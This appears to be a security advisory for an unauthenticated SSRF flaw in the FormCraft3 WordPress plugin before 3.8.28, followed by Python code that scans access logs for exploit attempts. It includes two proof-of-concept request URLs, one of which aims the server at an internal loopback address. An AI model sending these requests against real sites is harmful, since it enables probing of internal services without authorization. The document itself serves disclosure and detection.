The plugin does not validate the URL parameter in the formcraft3_get AJAX action, leading to SSRF issues exploitable by unauthenticated users.
https://example.com/wp-admin/admin-ajax.php?action=formcraft3_get&URL=https://wpscan.com

https://example.com/wp-admin/admin-ajax.php?action=formcraft3_get&URL=https://127.0.0.1:8181
CPE

Name | Operator | Version |
---|---|---|
formcraft3 | lt | 3.8.28 |
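
Requests to this action can be hunted for in web server access logs. The Python below is an added example, not part of the original advisory or the plugin's code: it scans combined-format log lines for the formcraft3_get action and classifies where the URL parameter points. The log lines, client addresses and function names are constructed for illustration.

```python
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /wp-admin/admin-ajax.php'
    '?action=formcraft3_get&URL=https://wpscan.com HTTP/1.1" 200 512',
    '198.51.100.23 - - [01/Jan/2024:10:00:05 +0000] "GET /wp-admin/admin-ajax.php'
    '?action=formcraft3_get&URL=https://127.0.0.1:8181 HTTP/1.1" 200 87',
    '203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "POST /wp-admin/admin-ajax.php'
    '?action=heartbeat HTTP/1.1" 200 41',
]

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def classify_target(url):
    """Return 'internal', 'external' or 'invalid' for the URL parameter's host."""
    try:
        host = urlsplit(url).hostname
    except ValueError:          # e.g. malformed IPv6 literal
        return "invalid"
    if not host:
        return "invalid"
    if host == "localhost" or host.endswith(".localhost"):
        return "internal"
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return "external"       # a hostname; DNS is deliberately not resolved here
    internal = ip.is_loopback or ip.is_private or ip.is_link_local or ip.is_reserved
    return "internal" if internal else "external"

def find_formcraft3_get(lines):
    """Return (client_ip, target_url, classification) per formcraft3_get request."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        parts = urlsplit(match.group(1))
        if not parts.path.endswith("/wp-admin/admin-ajax.php"):
            continue
        # Access logs record only the query string; request bodies are not visible.
        query = parse_qs(parts.query)   # also decodes percent-encoded values
        if "formcraft3_get" not in query.get("action", []):
            continue
        for target in query.get("URL", []):
            hits.append((line.split()[0], target, classify_target(target)))
    return hits
```

On a site still running a version below 3.8.28, every hit is worth reviewing, because the action needs no authentication; hits classified as internal deserve the closest look.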